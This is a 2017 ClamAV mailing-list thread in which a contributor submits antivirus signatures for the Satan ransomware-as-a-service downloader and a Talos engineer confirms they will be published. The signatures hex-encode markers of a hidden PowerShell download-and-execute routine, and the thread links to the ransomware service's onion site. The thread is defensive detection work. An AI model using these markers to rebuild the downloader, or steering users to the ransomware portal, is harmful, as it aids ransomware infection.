[Community-sigs] Satan Ransomware RaaS downloader

Christopher Marczewski cmarczewski at sourcefire.com
Mon Apr 10 13:37:31 EDT 2017 

Askar,

We have finished reviewing the signatures. They should be published soon.
I'm hopeful that they'll pass FP testing; engines on VirusTotal have yet to
alert on these downloaders.

Thanks again for the submission, & good catch!

On Mon, Apr 10, 2017 at 11:58 AM, Askar Dyussekeyev <dyussekeyev at yandex.kz>
wrote:

> Info:
> - https://satan6dll23napb5.onion.to/droppers (RaaS website, need to
> register)
>
> Samples:
> - https://virustotal.com/ru/file/0a3f919eba596900a1b6e793a30904
> c85a38d9ec0b882e6327607105adaefb5f/analysis/1491839688/
> - https://virustotal.com/ru/file/14e1b29392ac3ad11c342343383a1b
> d81e016c542ab5031a146a135d5df0b02e/analysis/1491839764/
>
> 02.04.2017, 02:41, "Askar Dyussekeyev" <dyussekeyev at yandex.kz>:
> > Hello!
> >
> > There is simple logical signature for Satan Ransomware RaaS downloader
> (at RaaS website classified as "dropper"), that looks for specific strings
> (at HTML and TEXT format):
> >
> > Win.Downloader.Satan.HTML;Engine:51-255,Target:3;0&1&2&
> 3&4&5&(6>1)&7&8&9&10&11&12&13&14;706F7765727368656C6C;
> 657865637574696F6E706F6C696379;627970617373;77696E646F777374796C65;
> 68696464656E;636F6D6D616E64;6E65772D6F626A656374;
> 73797374656D2E6E65742E776562636C69656E74;646F776E6C6F616464617461;
> 636F756E74;6C656E677468;62786F72;73797374656D2E636F6E76657274;
> 7772697465616C6C6279746573;7368656C6C65786563757465
> >
> > Win.Downloader.Satan.TXT;Engine:51-255,Target:7;0&1&2&
> 3&4&5&(6>1)&7&8&9&10&11&12&13&14;706F7765727368656C6C;
> 657865637574696F6E706F6C696379;627970617373;77696E646F777374796C65;
> 68696464656E;636F6D6D616E64;6E65772D6F626A656374;
> 73797374656D2E6E65742E776562636C69656E74;646F776E6C6F616464617461;
> 636F756E74;6C656E677468;62786F72;73797374656D2E636F6E76657274;
> 7772697465616C6C6279746573;7368656C6C65786563757465
> >
> > Best regards,
> > Askar
> > _______________________________________________
> > Community-sigs mailing list
> > Community-sigs at lists.clamav.net
> > http://lists.clamav.net/cgi-bin/mailman/listinfo/community-sigs
> >
> > http://www.clamav.net/contact.html#ml
> _______________________________________________
> Community-sigs mailing list
> Community-sigs at lists.clamav.net
> http://lists.clamav.net/cgi-bin/mailman/listinfo/community-sigs
>
> http://www.clamav.net/contact.html#ml
>



-- 
--
Christopher Marczewski
Research Engineer
Talos Group
cmarczewski at sourcefire.com
Phone: 443.832.2975

More information about the Community-sigs mailing list